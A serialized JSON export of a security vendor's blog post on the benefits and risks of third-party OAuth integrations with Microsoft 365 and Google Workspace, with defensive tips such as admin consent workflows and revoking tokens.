365 ","How do you find a malicious Microsoft 365 OAuth app? Learn what to look for, and what to ignore, when checking your users haven't been consent phished.","2021-09-06T00:00:00.000+01:00","how-to-find-a-malicious-oauth-app-on-microsoft-365",{"items":334374},[334375,334377],{"sys":334376,"name":26137},{"id":26136},{"sys":334378,"name":509},{"id":508},{"items":334380},[334381],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":334382},{"url":19129},{"__typename":1528,"sys":334384,"content":334385,"title":284931,"synopsis":331239,"hashTags":118,"publishedDate":331240,"slug":284932,"tagsCollection":334708,"authorsCollection":334714},{"id":273995},{"json":334386},{"data":334387,"content":334388,"nodeType":165},{},[334389,334395,334401,334406,334412,334417,334423,334429,334435,334441,334447,334452,334458,334464,334470,334486,334502,334518,334544,334567,334583,334589,334595,334601,334607,334613,334619,334635,334662,334668,334684,334690,334696,334702],{"data":334390,"content":334391,"nodeType":178},{},[334392],{"data":334393,"marks":334394,"value":330880,"nodeType":173},{},[],{"data":334396,"content":334397,"nodeType":178},{},[334398],{"data":334399,"marks":334400,"value":330887,"nodeType":173},{},[],{"data":334402,"content":334405,"nodeType":312},{"target":334403},{"sys":334404},{"id":330892,"type":317,"linkType":318},[],{"data":334407,"content":334408,"nodeType":178},{},[334409],{"data":334410,"marks":334411,"value":330900,"nodeType":173},{},[],{"data":334413,"content":334416,"nodeType":312},{"target":334414},{"sys":334415},{"id":330905,"type":317,"linkType":318},[],{"data":334418,"content":334419,"nodeType":235},{},[334420],{"data":334421,"marks":334422,"value":330913,"nodeType":173},{},[],{"data":334424,"content":334425,"nodeType":178},{},[334426],{"data":334427,"marks":334428,"value":330920,"nodeType":173},{},[],{"data":334430,"content":334431,"nodeType":178},{},[334432],{"data":334433,"marks":334434,"value":330927,"nodeType":173},{},[],{"data":334436,"content":334437,"nodeType":178},{},[334438],{"data":334439,"marks":334440,"value":330934,"nodeType":173},{},[],{"data":334442,"content":334443,"nodeType":178},{},[334444],{"data":334445,"marks":334446,"value":330941,"nodeType":173},{},[],{"data":334448,"content":334451,"nodeType":312},{"target":334449},{"sys":334450},{"id":330946,"type":317,"linkType":318},[],{"data":334453,"content":334454,"nodeType":178},{},[334455],{"data":334456,"marks":334457,"value":330954,"nodeType":173},{},[],{"data":334459,"content":334460,"nodeType":169},{},[334461],{"data":334462,"marks":334463,"value":330961,"nodeType":173},{},[],{"data":334465,"content":334466,"nodeType":178},{},[334467],{"data":334468,"marks":334469,"value":330968,"nodeType":173},{},[],{"data":334471,"content":334472,"nodeType":250},{},[334473],{"data":334474,"content":334475,"nodeType":254},{},[334476],{"data":334477,"content":334478,"nodeType":178},{},[334479,334483],{"data":334480,"marks":334481,"value":330982,"nodeType":173},{},[334482],{"type":370},{"data":334484,"marks":334485,"value":330986,"nodeType":173},{},[],{"data":334487,"content":334488,"nodeType":250},{},[334489],{"data":334490,"content":334491,"nodeType":254},{},[334492],{"data":334493,"content":334494,"nodeType":178},{},[334495,334499],{"data":334496,"marks":334497,"value":331000,"nodeType":173},{},[334498],{"type":370},{"data":334500,"marks":334501,"value":331004,"nodeType":173},{},[],{"data":334503,"content":334504,"nodeType":250},{},[334505],{"data":334506,"content":334507,"nodeType":254},{},[334508],{"data":334509,"content":334510,"nodeType":178},{},[334511,334515],{"data":334512,"marks":334513,"value":331018,"nodeType":173},{},[334514],{"type":370},{"data":334516,"marks":334517,"value":331022,"nodeType":173},{},[],{"data":334519,"content":334520,"nodeType":250},{},[334521],{"data":334522,"content":334523,"nodeType":254},{},[334524],{"data":334525,"content":334526,"nodeType":178},{},[334527,334531,334534,334541],{"data":334528,"marks":334529,"value":331036,"nodeType":173},{},[334530],{"type":370},{"data":334532,"marks":334533,"value":331040,"nodeType":173},{},[],{"data":334535,"content":334536,"nodeType":186},{"uri":331043},[334537],{"data":334538,"marks":334539,"value":331043,"nodeType":173},{},[334540],{"type":194},{"data":334542,"marks":334543,"value":74584,"nodeType":173},{},[],{"data":334545,"content":334546,"nodeType":250},{},[334547],{"data":334548,"content":334549,"nodeType":254},{},[334550],{"data":334551,"content":334552,"nodeType":178},{},[334553,334557,334560,334564],{"data":334554,"marks":334555,"value":331065,"nodeType":173},{},[334556],{"type":370},{"data":334558,"marks":334559,"value":331069,"nodeType":173},{},[],{"data":334561,"marks":334562,"value":331074,"nodeType":173},{},[334563],{"type":370},{"data":334565,"marks":334566,"value":197,"nodeType":173},{},[],{"data":334568,"content":334569,"nodeType":250},{},[334570],{"data":334571,"content":334572,"nodeType":254},{},[334573],{"data":334574,"content":334575,"nodeType":178},{},[334576,334580],{"data":334577,"marks":334578,"value":331091,"nodeType":173},{},[334579],{"type":370},{"data":334581,"marks":334582,"value":331095,"nodeType":173},{},[],{"data":334584,"content":334585,"nodeType":178},{},[334586],{"data":334587,"marks":334588,"value":331102,"nodeType":173},{},[],{"data":334590,"content":334591,"nodeType":178},{},[334592],{"data":334593,"marks":334594,"value":331109,"nodeType":173},{},[],{"data":334596,"content":334597,"nodeType":178},{},[334598],{"data":334599,"marks":334600,"value":331116,"nodeType":173},{},[],{"data":334602,"content":334603,"nodeType":178},{},[334604],{"data":334605,"marks":334606,"value":331123,"nodeType":173},{},[],{"data":334608,"content":334609,"nodeType":169},{},[334610],{"data":334611,"marks":334612,"value":331130,"nodeType":173},{},[],{"data":334614,"content":334615,"nodeType":178},{},[334616],{"data":334617,"marks":334618,"value":331137,"nodeType":173},{},[],{"data":334620,"content":334621,"nodeType":250},{},[334622],{"data":334623,"content":334624,"nodeType":254},{},[334625],{"data":334626,"content":334627,"nodeType":178},{},[334628,334632],{"data":334629,"marks":334630,"value":331151,"nodeType":173},{},[334631],{"type":370},{"data":334633,"marks":334634,"value":331155,"nodeType":173},{},[],{"data":334636,"content":334637,"nodeType":178},{},[334638,334641,334649,334652,334659],{"data":334639,"marks":334640,"value":331162,"nodeType":173},{},[],{"data":334642,"content":334645,"nodeType":1698},{"target":334643},{"sys":334644},{"id":269414,"type":317,"linkType":318},[334646],{"data":334647,"marks":334648,"value":331171,"nodeType":173},{},[],{"data":334650,"marks":334651,"value":331175,"nodeType":173},{},[],{"data":334653,"content":334654,"nodeType":186},{"uri":331178},[334655],{"data":334656,"marks":334657,"value":37,"nodeType":173},{},[334658],{"type":194},{"data":334660,"marks":334661,"value":37,"nodeType":173},{},[],{"data":334663,"content":334664,"nodeType":178},{},[334665],{"data":334666,"marks":334667,"value":331193,"nodeType":173},{},[],{"data":334669,"content":334670,"nodeType":250},{},[334671],{"data":334672,"content":334673,"nodeType":254},{},[334674],{"data":334675,"content":334676,"nodeType":178},{},[334677,334681],{"data":334678,"marks":334679,"value":331207,"nodeType":173},{},[334680],{"type":370},{"data":334682,"marks":334683,"value":331211,"nodeType":173},{},[],{"data":334685,"content":334686,"nodeType":178},{},[334687],{"data":334688,"marks":334689,"value":331218,"nodeType":173},{},[],{"data":334691,"content":334692,"nodeType":178},{},[334693],{"data":334694,"marks":334695,"value":331225,"nodeType":173},{},[],{"data":334697,"content":334698,"nodeType":169},{},[334699],{"data":334700,"marks":334701,"value":40632,"nodeType":173},{},[],{"data":334703,"content":334704,"nodeType":178},{},[334705],{"data":334706,"marks":334707,"value":331238,"nodeType":173},{},[],{"items":334709},[334710,334712],{"sys":334711,"name":26133},{"id":26132},{"sys":334713,"name":26137},{"id":26136},{"items":334715},[334716],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":334717},{"url":8615},{"items":334719},[334720],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":334721},{"url":8615},{"json":334723,"links":335396},{"nodeType":165,"data":334724,"content":334725},{},[334726,334733,334740,334747,334767,334774,334803,334810,334817,334836,334842,334849,334856,334862,334869,334876,334882,334889,334895,334901,334908,334914,334921,334927,334934,334941,334948,334955,334962,334969,334976,334983,334990,335053,335060,335225,335232,335239,335385,335390],{"nodeType":178,"data":334727,"content":334728},{},[334729],{"nodeType":173,"value":334730,"marks":334731,"data":334732},"It’s no secret that SaaS use is growing exponentially, but less has been said about third-party SaaS integrations, especially to core platforms like M365 or Google Workspace. In this article, we’ll explain what these third-party integrations are and what the security benefits vs risks of using them in your organization are. We’ll also provide some helpful tips about what you can do to remediate or at least lessen the risks.",[],{},{"nodeType":169,"data":334734,"content":334735},{},[334736],{"nodeType":173,"value":334737,"marks":334738,"data":334739},"What are third-party SaaS integrations and what the heck is OAuth?",[],{},{"nodeType":178,"data":334741,"content":334742},{},[334743],{"nodeType":173,"value":334744,"marks":334745,"data":334746},"A third-party SaaS integration with your M365 or Google Workspace deployment allows an employee (or administrator) to grant some level of access to your data by that SaaS vendor. Employees want to connect these apps because they want to easily share projects across their tools, or integrate add-on features that make their workspaces more flexible or customized to their needs, or they simply need them to be more productive. And those apps must have some level of access to your data (and the employee’s data) to function properly. The problem comes in primarily because the level of access each app requests can vary significantly by both the type of data exposed and the number of employees it affects. ",[],{},{"nodeType":178,"data":334748,"content":334749},{},[334750,334754,334763],{"nodeType":173,"value":334751,"marks":334752,"data":334753},"It can be as simple as sharing an employee’s full name and email address with the SaaS provider if they login using their business Microsoft/Google account, otherwise known as a \"",[],{},{"nodeType":1698,"data":334755,"content":334758},{"target":334756},{"sys":334757},{"id":273995,"type":317,"linkType":318},[334759],{"nodeType":173,"value":334760,"marks":334761,"data":334762},"social login",[],{},{"nodeType":173,"value":334764,"marks":334765,"data":334766},".\" However, integrations can also request access to much more sensitive data, such as email inboxes and document stores (OneDrive, Sharepoint, Google Drive). Employees with administrative privileges can even create integrations that allow access to all employees’ data, rather than sharing only their own data. ",[],{},{"nodeType":178,"data":334768,"content":334769},{},[334770],{"nodeType":173,"value":334771,"marks":334772,"data":334773},"Clearly, the security and compliance risks associated are highly variable depending on the type of integration.",[],{},{"nodeType":178,"data":334775,"content":334776},{},[334777,334781,334788,334792,334800],{"nodeType":173,"value":334778,"marks":334779,"data":334780},"OAuth is an industry standard protocol for authorization (",[],{},{"nodeType":186,"data":334782,"content":334784},{"uri":334783},"https://oauth.net/2/",[334785],{"nodeType":173,"value":334783,"marks":334786,"data":334787},[],{},{"nodeType":173,"value":334789,"marks":334790,"data":334791},"). If you want to share your data on one app with another third-party app, rather than share your username and password, OAuth provides a way to authorize access to specific data based on a set of permissions. You can even later revoke access to specific apps without changing your password. A vendor that allows sharing of their data via OAuth can implement their own custom permissions - Google implements hundreds of permissions alone (",[],{},{"nodeType":186,"data":334793,"content":334795},{"uri":334794},"https://developers.google.com/identity/protocols/oauth2/scopes",[334796],{"nodeType":173,"value":334794,"marks":334797,"data":334799},[334798],{"type":194},{},{"nodeType":173,"value":60235,"marks":334801,"data":334802},[],{},{"nodeType":178,"data":334804,"content":334805},{},[334806],{"nodeType":173,"value":334807,"marks":334808,"data":334809},"Essentially, OAuth is the protocol that allows you to easily choose which data you share with who and thus is a very common approach for how SaaS platforms integrate with other core SaaS platforms like Google or Microsoft.    ",[],{},{"nodeType":235,"data":334811,"content":334812},{},[334813],{"nodeType":173,"value":334814,"marks":334815,"data":334816},"An Example - Adobe Creative Cloud",[],{},{"nodeType":178,"data":334818,"content":334819},{},[334820,334824,334832],{"nodeType":173,"value":334821,"marks":334822,"data":334823},"Let’s say your Marketing team wants to make use of Adobe Creative Cloud - perhaps they need Photoshop for some image-editing and Acrobat for some PDF-editing for marketing materials. They pop along to ",[],{},{"nodeType":186,"data":334825,"content":334827},{"uri":334826},"https://creativecloud.adobe.com/",[334828],{"nodeType":173,"value":334826,"marks":334829,"data":334831},[334830],{"type":194},{},{"nodeType":173,"value":334833,"marks":334834,"data":334835}," and click to sign up and are presented with the following choice: ",[],{},{"nodeType":312,"data":334837,"content":334841},{"target":334838},{"sys":334839},{"id":334840,"type":317,"linkType":318},"ffx3tPYZNwZD6xj7IcLm1",[],{"nodeType":178,"data":334843,"content":334844},{},[334845],{"nodeType":173,"value":334846,"marks":334847,"data":334848},"Your organization is using Google Workspace for most core business functions, so they think “Oh great, I can login using my business Google account, no need to setup yet another online account and password!”",[],{},{"nodeType":178,"data":334850,"content":334851},{},[334852],{"nodeType":173,"value":334853,"marks":334854,"data":334855},"They click to “Continue with Google” and are presented with the choice to select their account. They are already logged in with Google so they don’t even need to enter their password.",[],{},{"nodeType":312,"data":334857,"content":334861},{"target":334858},{"sys":334859},{"id":334860,"type":317,"linkType":318},"507PcDcFrMbGBdpVzt8RFl",[],{"nodeType":178,"data":334863,"content":334864},{},[334865],{"nodeType":173,"value":334866,"marks":334867,"data":334868},"That’s it, they are now signed up to Adobe Creative Cloud, they pay their subscription and start using Adobe’s SaaS offerings. This is known as a Social Login, and it lets your marketing team quickly and easily log into Adobe using their existing Google account.",[],{},{"nodeType":178,"data":334870,"content":334871},{},[334872],{"nodeType":173,"value":334873,"marks":334874,"data":334875},"However, very limited data access has actually been provided to Adobe. Adobe has only been authorized to access basic details of the employee who signed up, as you can see in the integration details below:",[],{},{"nodeType":312,"data":334877,"content":334881},{"target":334878},{"sys":334879},{"id":334880,"type":317,"linkType":318},"HwDgqIjni9MzkwGJikdk1",[],{"nodeType":178,"data":334883,"content":334884},{},[334885],{"nodeType":173,"value":334886,"marks":334887,"data":334888},"However, after some use of Photoshop and Acrobat, your marketing team needs to both open and save documents on their Google Drive or OneDrive as that’s how they collaborate on all other documents within the company. No problem, Adobe allows you to add one of many cloud storage options. Given your company is using Google Drive, they pick that option and are presented with a new permission request from Google:",[],{},{"nodeType":312,"data":334890,"content":334894},{"target":334891},{"sys":334892},{"id":334893,"type":317,"linkType":318},"3pVLUawIy8ZIZwFCZXCOs8",[],{"nodeType":312,"data":334896,"content":334900},{"target":334897},{"sys":334898},{"id":334899,"type":317,"linkType":318},"zNKE1Et3zgLPFmdrvQrh4",[],{"nodeType":178,"data":334902,"content":334903},{},[334904],{"nodeType":173,"value":334905,"marks":334906,"data":334907},"This time, Adobe is requesting much more sensitive access than merely basic personal details - it’s asking for full read/write access to the employee’s entire Google Drive store. Google makes sure that’s clear and asks for authorization. Your employee clicks to continue and now they have the ability to read and write Google Drive from within Acrobat:",[],{},{"nodeType":312,"data":334909,"content":334913},{"target":334910},{"sys":334911},{"id":334912,"type":317,"linkType":318},"3EztvIY0a6amE9qx6pi3Pe",[],{"nodeType":178,"data":334915,"content":334916},{},[334917],{"nodeType":173,"value":334918,"marks":334919,"data":334920},"We can now see a new integration has been created, exposing a much more significant asset by allowing full access to Google Drive on behalf of the marketing employee.",[],{},{"nodeType":312,"data":334922,"content":334926},{"target":334923},{"sys":334924},{"id":334925,"type":317,"linkType":318},"7EJrX4ccSmWzWJ1kC6kMzf",[],{"nodeType":178,"data":334928,"content":334929},{},[334930],{"nodeType":173,"value":334931,"marks":334932,"data":334933},"We have just followed a user journey for two particularly common examples of integrations, but there are a huge number of SaaS providers out there and a huge variety of different types of integrations. However, the most common cases are simple social logins, document access, email access, calendar access and contacts access depending on the SaaS provider in use.",[],{},{"nodeType":169,"data":334935,"content":334936},{},[334937],{"nodeType":173,"value":334938,"marks":334939,"data":334940},"Should I be worried about this?",[],{},{"nodeType":178,"data":334942,"content":334943},{},[334944],{"nodeType":173,"value":334945,"marks":334946,"data":334947},"As always, the answer is “it depends.” On the one hand, by default your employees can enable integrations for their own account with whatever third parties they like and potentially expose very sensitive data assets like document stores and email. It’s a bit melodramatic to put it this way, but consenting to OAuth permissions is like giving a third party an everlasting password to act in a limited capacity as a number of users with minimal monitoring and trusting them not to abuse that access.  ",[],{},{"nodeType":178,"data":334949,"content":334950},{},[334951],{"nodeType":173,"value":334952,"marks":334953,"data":334954},"On the other, many integrations (especially the ones you’ll recognize by name) don’t ask for excessive permissions, and are managed by responsible and security conscious vendors that generally do a great job of securing your data. The challenge is finding integrations for which this isn’t true.",[],{},{"nodeType":178,"data":334956,"content":334957},{},[334958],{"nodeType":173,"value":334959,"marks":334960,"data":334961},"The reality is that it’s probably already happening across your organization, whether you know it or not. After all, SaaS use is key to modern working environments and your employees will be using it somehow. At Push Security, it’s not unusual for us to see hundreds of third-party integrations on our customers’ Google Workspace and M365 instances, even in relatively small organizations. ",[],{},{"nodeType":178,"data":334963,"content":334964},{},[334965],{"nodeType":173,"value":334966,"marks":334967,"data":334968},"And in fact it’s not all doom and gloom, since your employees need to use SaaS providers anyway, there are actually some security benefits to making use of social logins and third party SaaS integrations are the key mechanism for doing so. ",[],{},{"nodeType":178,"data":334970,"content":334971},{},[334972],{"nodeType":173,"value":334973,"marks":334974,"data":334975},"This is a key reason to not take a heavy-handed stance of “block all integrations” - while you would certainly reduce the risk of data leaks, you’d also be losing the security benefits of social logins and severely hindering your employees from getting things done quickly and easily. You will also probably force them into effectively doing the same in a different way anyway (perhaps they simply start using their personal google account and google drive where they can do these integrations instead?).",[],{},{"nodeType":169,"data":334977,"content":334978},{},[334979],{"nodeType":173,"value":334980,"marks":334981,"data":334982},"\nWhat are the security benefits?",[],{},{"nodeType":178,"data":334984,"content":334985},{},[334986],{"nodeType":173,"value":334987,"marks":334988,"data":334989},"There are a number of security benefits to using social logins and third-party integrations, but a few key considerations are:",[],{},{"nodeType":250,"data":334991,"content":334992},{},[334993,335008,335023,335038],{"nodeType":254,"data":334994,"content":334995},{},[334996],{"nodeType":178,"data":334997,"content":334998},{},[334999,335004],{"nodeType":173,"value":335000,"marks":335001,"data":335003},"Fewer passwords",[335002],{"type":370},{},{"nodeType":173,"value":335005,"marks":335006,"data":335007}," - if your employees use social logins everywhere, they can focus on having one strong password and not have to manage separate accounts and passwords for 20 different SaaS platforms.",[],{},{"nodeType":254,"data":335009,"content":335010},{},[335011],{"nodeType":178,"data":335012,"content":335013},{},[335014,335019],{"nodeType":173,"value":335015,"marks":335016,"data":335018},"MFA everywhere",[335017],{"type":370},{},{"nodeType":173,"value":335020,"marks":335021,"data":335022}," - if you have set up strong password policies and enforced MFA on your Google and Microsoft accounts, all of your SaaS platforms inherit the same security if you are using social logins.",[],{},{"nodeType":254,"data":335024,"content":335025},{},[335026],{"nodeType":178,"data":335027,"content":335028},{},[335029,335034],{"nodeType":173,"value":335030,"marks":335031,"data":335033},"Visibility of SaaS use",[335032],{"type":370},{},{"nodeType":173,"value":335035,"marks":335036,"data":335037}," - if employees use custom logins for all their SaaS platforms, you’ll have no idea what SaaS is in use (unless you use the Push browser extension ;)). With social logins and third-party integrations, you can see exactly what integrations you have across your organization, including which employees have shared which type of data access.",[],{},{"nodeType":254,"data":335039,"content":335040},{},[335041],{"nodeType":178,"data":335042,"content":335043},{},[335044,335049],{"nodeType":173,"value":335045,"marks":335046,"data":335048},"Fine-grained permissions ",[335047],{"type":370},{},{"nodeType":173,"value":335050,"marks":335051,"data":335052},"- OAuth integrations can request as little or as much access as they like. Ideally, many integrations will be nothing more than a social login or will otherwise limit the permissions to a small subset of data they require to reduce the risk. This is far more transparent than alternatives like integrations using API keys typically are.",[],{},{"nodeType":235,"data":335054,"content":335055},{},[335056],{"nodeType":173,"value":335057,"marks":335058,"data":335059},"What are the security risks?",[],{},{"nodeType":250,"data":335061,"content":335062},{},[335063,335078,335093,335130,335145,335173,335200],{"nodeType":254,"data":335064,"content":335065},{},[335066],{"nodeType":178,"data":335067,"content":335068},{},[335069,335074],{"nodeType":173,"value":335070,"marks":335071,"data":335073},"Blindspots in your attack surface",[335072],{"type":370},{},{"nodeType":173,"value":335075,"marks":335076,"data":335077}," - At a higher level, you need to care because each of these third parties is now handling your data and you need to ensure they only have access to what they need to function, that they’re storing and managing your data responsibly, and that you treat them as you would any other vendor in your supply chain.",[],{},{"nodeType":254,"data":335079,"content":335080},{},[335081],{"nodeType":178,"data":335082,"content":335083},{},[335084,335089],{"nodeType":173,"value":335085,"marks":335086,"data":335088},"Excessive permissions",[335087],{"type":370},{},{"nodeType":173,"value":335090,"marks":335091,"data":335092}," - Third-party integrations can request whatever permissions they like. Some SaaS apps may choose to request excessively high permissions and simply not function unless an employee accepts it. This can lead to employees being conditioned to accept permissions whatever they are and granting excessive permissions.",[],{},{"nodeType":254,"data":335094,"content":335095},{},[335096],{"nodeType":178,"data":335097,"content":335098},{},[335099,335103,335107,335114,335117,335126],{"nodeType":173,"value":39940,"marks":335100,"data":335102},[335101],{"type":370},{},{"nodeType":173,"value":335104,"marks":335105,"data":335106}," - A technique that tricks a user into granting a malicious third-party app access to their account. Since this technique preys on users that are already logged in, it is effective against users with strong passwords, multi-factor authentication, or even passwordless setups. You can read more about this technique in our ",[],{},{"nodeType":186,"data":335108,"content":335109},{"uri":331178},[335110],{"nodeType":173,"value":335111,"marks":335112,"data":335113},"previous blog post",[],{},{"nodeType":173,"value":2340,"marks":335115,"data":335116},[],{},{"nodeType":186,"data":335118,"content":335120},{"uri":335119},"https://www.bleepingcomputer.com/news/security/sans-shares-details-on-attack-that-led-to-their-data-breach/",[335121],{"nodeType":173,"value":335122,"marks":335123,"data":335125},"SANS had a breach in 2020",[335124],{"type":194},{},{"nodeType":173,"value":335127,"marks":335128,"data":335129}," caused by a consent phishing attack, which led to a leak of around 28,000 records of SANs members’ personal information (PII).",[],{},{"nodeType":254,"data":335131,"content":335132},{},[335133],{"nodeType":178,"data":335134,"content":335135},{},[335136,335141],{"nodeType":173,"value":335137,"marks":335138,"data":335140},"SaaS account compromise",[335139],{"type":370},{},{"nodeType":173,"value":335142,"marks":335143,"data":335144}," - If an employee has a separate account and password for a SaaS platform and that is compromised somehow, any integrations with your Google workspace or M365 are also compromised. For example, perhaps they have a weak password with no MFA on a SaaS provider and then an attacker uses that to access Google Drive via a pre-existing integration from that SaaS platform.",[],{},{"nodeType":254,"data":335146,"content":335147},{},[335148],{"nodeType":178,"data":335149,"content":335150},{},[335151,335156,335160,335169],{"nodeType":173,"value":335152,"marks":335153,"data":335155},"SaaS provider compromise",[335154],{"type":370},{},{"nodeType":173,"value":335157,"marks":335158,"data":335159}," - If a SaaS provider itself is compromised, any integrations could also be exploited. This is the SaaS integration equivalent of an MSP or other third party with privileged access to your data being compromised. Hubspot ",[],{},{"nodeType":186,"data":335161,"content":335163},{"uri":335162},"https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html",[335164],{"nodeType":173,"value":335165,"marks":335166,"data":335168},"experienced a breach",[335167],{"type":194},{},{"nodeType":173,"value":335170,"marks":335171,"data":335172}," in April 2022, which “allowed malicious actors the ability to access and export contact data using the employee's access to several HubSpot accounts.”",[],{},{"nodeType":254,"data":335174,"content":335175},{},[335176],{"nodeType":178,"data":335177,"content":335178},{},[335179,335184,335188,335196],{"nodeType":173,"value":335180,"marks":335181,"data":335183},"Stolen integration tokens ",[335182],{"type":370},{},{"nodeType":173,"value":335185,"marks":335186,"data":335187},"- The way integrations work under the hood are via OAuth tokens. If these are stolen somehow, due to a device compromise or SaaS provider compromise, they can potentially be used to gain access to data, similar to if a password was stolen in the same circumstances. They also do not expire on a password change, so changing a password after a compromise is not enough on its own to deal with this threat. A recent example of this was the ",[],{},{"nodeType":186,"data":335189,"content":335191},{"uri":335190},"https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens/",[335192],{"nodeType":173,"value":335193,"marks":335194,"data":335195},"exploitation of GitHub",[],{},{"nodeType":173,"value":335197,"marks":335198,"data":335199}," via tokens stolen from Heroku and TravisCI. ",[],{},{"nodeType":254,"data":335201,"content":335202},{},[335203],{"nodeType":178,"data":335204,"content":335205},{},[335206,335211,335215,335222],{"nodeType":173,"value":335207,"marks":335208,"data":335210},"Integration backdoors",[335209],{"type":370},{},{"nodeType":173,"value":335212,"marks":335213,"data":335214}," - Integrations provide another method of backdoor access to a user account post-compromise. Setting up a malicious integration is one method to maintain access to data that will survive a password change conducted as part of incident response. A real-world example of this issue was a privilege escalation attack in Azure, covered nicely ",[],{},{"nodeType":186,"data":335216,"content":335218},{"uri":335217},"https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5",[335219],{"nodeType":173,"value":28052,"marks":335220,"data":335221},[],{},{"nodeType":173,"value":2340,"marks":335223,"data":335224},[],{},{"nodeType":235,"data":335226,"content":335227},{},[335228],{"nodeType":173,"value":335229,"marks":335230,"data":335231},"Security guidance tips for third-party integrations",[],{},{"nodeType":178,"data":335233,"content":335234},{},[335235],{"nodeType":173,"value":335236,"marks":335237,"data":335238},"Let’s face it, your employees need to use SaaS solutions to be productive and they are going to use them somehow. We have even seen how third-party SaaS integrations can provide some security benefits, too, but there are new risks to be aware of as well. Here are some basic security tips to consider to ensure you are enabling this practice securely.",[],{},{"nodeType":250,"data":335240,"content":335241},{},[335242,335257,335272,335287,335302,335317,335358],{"nodeType":254,"data":335243,"content":335244},{},[335245],{"nodeType":178,"data":335246,"content":335247},{},[335248,335253],{"nodeType":173,"value":335249,"marks":335250,"data":335252},"Gain visibility",[335251],{"type":370},{},{"nodeType":173,"value":335254,"marks":335255,"data":335256}," - Whether you know it or not, your employees are probably using SaaS platforms, which may include third-party SaaS integrations. Find out what SaaS platforms and integrations are in use and pay attention to any with sensitive permissions you might want to review. Push can help do this for you. ",[],{},{"nodeType":254,"data":335258,"content":335259},{},[335260],{"nodeType":178,"data":335261,"content":335262},{},[335263,335268],{"nodeType":173,"value":335264,"marks":335265,"data":335267},"Remove dormant or infrequently used integrations ",[335266],{"type":370},{},{"nodeType":173,"value":335269,"marks":335270,"data":335271},"- Reduce your attack surface by simply removing the apps no one or only a few people are using. This also makes the third-party security vetting process a bit less burdensome, so it’s a smart move once you know which integrations won’t be missed when they’re gone. We can help with this as well. ",[],{},{"nodeType":254,"data":335273,"content":335274},{},[335275],{"nodeType":178,"data":335276,"content":335277},{},[335278,335283],{"nodeType":173,"value":335279,"marks":335280,"data":335282},"Modify incident response playbooks ",[335281],{"type":370},{},{"nodeType":173,"value":335284,"marks":335285,"data":335286},"- If you have incident response playbooks in place for what to do in the event of an employee’s password being compromised or their laptop/mobile being stolen or infected with malware, you need to consider modifying these. Consider adding invalidating SaaS OAuth tokens in addition to standard steps like password changes, remote wipes and fresh device builds.",[],{},{"nodeType":254,"data":335288,"content":335289},{},[335290],{"nodeType":178,"data":335291,"content":335292},{},[335293,335298],{"nodeType":173,"value":335294,"marks":335295,"data":335297},"Encourage social logins ",[335296],{"type":370},{},{"nodeType":173,"value":335299,"marks":335300,"data":335301},"- Social logins have a bit of a bad rap, possibly this is due to their roots in low security, non-work environments - but that being said, when using your M365 or Workspace as the identity source these methods are a great for for many organizations that struggle with weak passwords, shared passwords and a lack of MFA across SaaS apps. If you're going to be using social logins, it makes sense to ensure your Google/Microsoft accounts have good password policies and MFA. ",[],{},{"nodeType":254,"data":335303,"content":335304},{},[335305],{"nodeType":178,"data":335306,"content":335307},{},[335308,335313],{"nodeType":173,"value":335309,"marks":335310,"data":335312},"Educate your users about consent phishing",[335311],{"type":370},{},{"nodeType":173,"value":335314,"marks":335315,"data":335316}," - Awareness of traditional phishing for passwords is pretty high these days, but awareness about consent phishing is far lower. Make sure your employees are aware of this as well and know who to speak to if they’re worried they consented to a malicious app.",[],{},{"nodeType":254,"data":335318,"content":335319},{},[335320],{"nodeType":178,"data":335321,"content":335322},{},[335323,335328,335332,335341,335345,335354],{"nodeType":173,"value":335324,"marks":335325,"data":335327},"Admin approval for sensitive permissions - ",[335326],{"type":370},{},{"nodeType":173,"value":335329,"marks":335330,"data":335331},"M365 has an admin approval process for integrations and allows you to define low risk permissions that users can consent to themselves. This can allow you to empower users to use social logins and lower risk integrations on their own, but require an admin to approve apps requiring more sensitive permissions. Google workspace allows you to configure restricted permissions but is much less flexible. Check out Microsoft’s ",[],{},{"nodeType":186,"data":335333,"content":335335},{"uri":335334},"https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow",[335336],{"nodeType":173,"value":335337,"marks":335338,"data":335340},"admin consent workflow guide",[335339],{"type":194},{},{"nodeType":173,"value":335342,"marks":335343,"data":335344}," and their article about ",[],{},{"nodeType":186,"data":335346,"content":335348},{"uri":335347},"https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-permission-classifications?tabs=azure-portal",[335349],{"nodeType":173,"value":335350,"marks":335351,"data":335353},"how to configure permissions ",[335352],{"type":194},{},{"nodeType":173,"value":335355,"marks":335356,"data":335357},"for more guidance.",[],{},{"nodeType":254,"data":335359,"content":335360},{},[335361],{"nodeType":178,"data":335362,"content":335363},{},[335364,335369,335373,335382],{"nodeType":173,"value":335365,"marks":335366,"data":335368},"Prioritize apps that need additional vetting ",[335367],{"type":370},{},{"nodeType":173,"value":335370,"marks":335371,"data":335372},"- prioritize apps based on how many people in the company use it and if it’s requesting access to highly sensitive data to work or integrating with SaaS that have data you don’t want exposed. We provided some more practical guidance on risk prioritization ",[],{},{"nodeType":1698,"data":335374,"content":335377},{"target":335375},{"sys":335376},{"id":283466,"type":317,"linkType":318},[335378],{"nodeType":173,"value":28052,"marks":335379,"data":335381},[335380],{"type":194},{},{"nodeType":173,"value":1477,"marks":335383,"data":335384},[],{},{"nodeType":312,"data":335386,"content":335389},{"target":335387},{"sys":335388},{"id":318410,"type":317,"linkType":318},[],{"nodeType":178,"data":335391,"content":335392},{},[335393],{"nodeType":173,"value":37,"marks":335394,"data":335395},[],{},{"entries":335397},{"inline":335398,"hyperlink":335399,"block":335404},[],[335400,335402],{"sys":335401,"__typename":1528,"title":284931,"slug":284932},{"id":273995},{"sys":335403,"__typename":1528,"title":297416,"slug":297419},{"id":283466},[335405,335412,335418,335424,335429,335436,335441,335447],{"sys":335406,"__typename":5345,"title":335407,"caption":335408,"layoutMode":118,"file":335409},{"id":334840},"OAuth Adobe example","Example of an OAuth / Social 